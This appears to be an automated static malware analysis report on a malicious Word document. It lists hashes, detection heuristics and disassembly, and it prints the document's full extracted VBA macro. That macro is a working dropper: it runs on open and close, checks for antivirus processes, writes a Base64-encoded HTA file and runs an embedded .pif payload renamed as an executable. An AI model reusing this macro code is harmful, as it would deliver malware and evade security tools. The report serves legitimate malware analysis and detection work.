Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 352ba37e368a4ca5…

MALICIOUS

Office (OLE)

207.5 KB Created: 2018-09-05 11:49:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: dcc53b3285f08291c36a001b3a4487eb SHA-1: bd1109be884727b34378086bd43a756713b36914 SHA-256: 352ba37e368a4ca54b3ed4228c86e793760de9f7026237a1f17bc7b85c204caf
838 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic T1059.001 PowerShell T1140 Deobfuscate/Decode Files or Information

The sample exploits CVE-2007-3899, a memory corruption vulnerability in Microsoft Word, to execute a VBA macro. This macro utilizes WScript.Shell and WMI to launch a second-stage executable, embedded_office_00016e66.exe. The macro also contains a Base64-decoded command stager that executes 'cmd.exe /c ping localhost -n 100 &&', indicating an attempt to download and execute further payloads.

Heuristics 20

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Malware.Valyria-6698324-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6698324-0
  • XOR-encoded strings (key 0xD2) critical SC_XOR_ENCODED
    Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0xD2: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly
    x86 disassembly · validity: code (0.823) — no internal branches to corroborate control flow
    0002026C  9e                sahf
    0002026D  bdb3b69ebb        mov ebp, 0xbb9eb6b3
    00020272  b0a0              mov al, 0xa0
    00020274  b3a0              mov bl, 0xa0
    00020276  ab                stosd dword ptr es:[edi], eax
    00020277  93                xchg ebx, eax
    00020278  d25112            rcl byte ptr [ecx + 0x12], cl
    0002027B  d15b57            rcr dword ptr [ebx + 0x57], 1
    0002027E  ca2d2d            retf 0x2d2d
    00020281  2d8a5957ca        sub eax, 0xca57598a
    00020286  2d2d2d8259        sub eax, 0x59822d2d
    0002028B  9f                lahf
    0002028C  22832d870a5b      and al, byte ptr [ebx + 0x5b0a872d]
    00020292  57                push edi
    00020293  e62d              out 0x2d, al
    00020295  2d2d823ad2        sub eax, 0xd23a822d
    0002029A  d2d2              rcl dl, cl
    0002029C  d28a39df84bb      ror byte ptr [edx - 0x447b20c7], cl
    000202A2  a0a6a7b3be        mov al, byte ptr [0xbeb3a7a6]
    000202A7  93                xchg ebx, eax
    000202A8  bebebdb1d2        mov esi, 0xd2b1bdbe
    000202AD  51                push ecx
    000202AE  12d1              adc dl, cl
    000202B0  5b                pop ebx
    000202B1  57                push edi
    000202B2  ea2d2d2d8a5947    ljmp 0x4759:0x8a2d2d2d
    000202B9  ea2d2d2d805997    ljmp 0x9759:0x802d2d2d
    000202C0  22822d870a5b      and al, byte ptr [edx + 0x5b0a872d]
    000202C6  97                xchg edi, eax
    000202C7  6a82              push -0x7e
    000202C9  3ad2              cmp dl, dl
    000202CB  d2                .byte 0xd2
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 9 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set wsh = VBA.CreateObject("WScript.Shell")
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set gDvcvsd = GetObject("wi" & "nmgmts:")
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    Set gDvcvsd = GetObject("wi" & "nmgmts:")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set wsh = VBA.CreateObject("WScript.Shell")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set gDvcvsd = GetObject("wi" & "nmgmts:")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Open Environ("Temp") & "\1.hta" For Output As #1
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5641 bytes
SHA-256: 5d918920ca6728791af74c42e77df828322a06bb8bb1737ec56702928c6760fa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next


Call kfs
    


Call sdfsdf

 Set d = New DataObject
    d.SetText " "
    d.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
   Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13

  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 3, t)


Call Module1.killo

End Sub

Private Sub Document_Close()
Call closee

End Sub

Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function

Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Attribute VB_Name = "Module2"
Sub closee()



Dim Hdfgdwd, gDvcvsd
Dim fdfdgsd
Set gDvcvsd = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
Set Hdfgdwd = gDvcvsd.ExecQuery("SELECT * FROM Win32_Process")
Dim hdffsdfs
For Each x In Hdfgdwd
Set wsh = VBA.CreateObject("WScript.Shell")
Dim pipec As Boolean: pipec = True


 If x.Name = "bdagent.exe" Then
 Dim kk
 kk = StrConv(DecodeBase64("IFdJT" & "kRPV1N" & "UQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQogICAgDQogICAgICAgIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCiAgICAgICAgV3NoU2hlbGwuUnVuKCI2LmV4ZSIsIDEsIGZhbHNlKTsNCiAgICAgICAgDQogICAgPC9zY3JpcHQ+DQogPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPg0KICAgICAgICAgIFdpbmRvdy5DbG9zZQ0KICAgICA8L1NDUklQVD4NCjwvaGVhZD4NCjxib2R5Pg0KICAgDQo8L2JvZHk+DQo8L2h0bWw+DQo="), vbUnicode)
 
Open Environ("Temp") & "\1.hta" For Output As #1
  Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
  Print #1, kk
  Close #1
  
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
   End If
    
   
    If x.Name = "PSUAMain.exe" Then

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
Next


Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide


End Sub


Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function



Attribute VB_Name = "Module3"
Sub kfs()
Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveDown Unit:=wdScreen, Count:=7
 Selection.MoveRight Unit:=wdCharacter, Count:=24
    Selection.TypeBackspace
        Selection.Copy

End Sub

Attribute VB_Name = "Module4"

Sub sdfsdf()

Dim kk, lll
lll = "e" & "xe"
kk = ".p" & "if"
ChDir Environ("Temp")
Selection.TypeBackspace

   Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")


FSO.copyfile Source:="5C" & kk, Destination:="6." & lll
FSO.copyfile Source:="5C" & kk, Destination:="6" & UserForm1.TextBox1.Text
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function



Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{7BD97CFF-E6A6-411C-901C-6DFCC38C80A6}{DBC2429A-F48B-41A6-97FF-83968A45408A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E296C0D9-B460-4B9A-BE4F-EF37BBB80D0B}{FE155B10-F35F-4245-A78C-ABC85D7D2F90}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
embedded_office_00016e66.exe embedded-pe Office MZ+PE at offset 0x16E66 118682 bytes
SHA-256: b7121de4b320ec80a7d030a454c4bffe44360475f2ebbab5da24ddeba954f041
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1597663758/Ole10Native 72980 bytes
SHA-256: d2d95478d8941fa826533aee7ac66a26be7b2d03ed3cb80a5c76e3e7f8e5c7f1
ole10native_00_5C.pif ole-package-payload OLE Ole10Native payload: ObjectPool/_1597663758/Ole10Native; display_name=5C.pif; full_path=C:\Users\win7home\AppData\Local\Temp\5C.pif; temp_path=; def_file= 72704 bytes
SHA-256: 5b4918e5c17099b65c96b2fc6765143f20c06e7bc38b168b4892b4a3237a8b26